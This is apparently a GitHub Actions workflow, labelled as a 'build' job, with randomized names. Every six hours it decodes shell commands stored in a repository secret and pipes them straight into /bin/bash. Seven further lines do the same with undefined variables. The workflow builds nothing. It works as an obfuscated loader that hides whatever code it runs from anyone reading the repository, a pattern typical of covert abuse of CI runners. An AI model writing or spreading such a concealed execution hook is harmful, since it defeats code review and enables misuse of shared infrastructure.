name: fudouding1938
on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fudouding1938
        env:
          dbr59302: ${{ secrets.dbr59302 }}
        run: |
          echo $dbr59302 | jq -r .ni632 | /bin/bash
          echo $wizor24 | jq -r .c1 | /bin/bash
          echo $fma77976 | jq -r .m1 | /bin/bash
          echo $gj14040 | jq -r .idrw2046 | /bin/bash
          echo $js54 | jq -r .zvfl39835 | /bin/bash
          echo $ry3290 | jq -r .lwhnz97240 | /bin/bash
          echo $ux29 | jq -r .cumpx3674 | /bin/bash
          echo $csye34733 | jq -r .vjaoh4 | /bin/bash

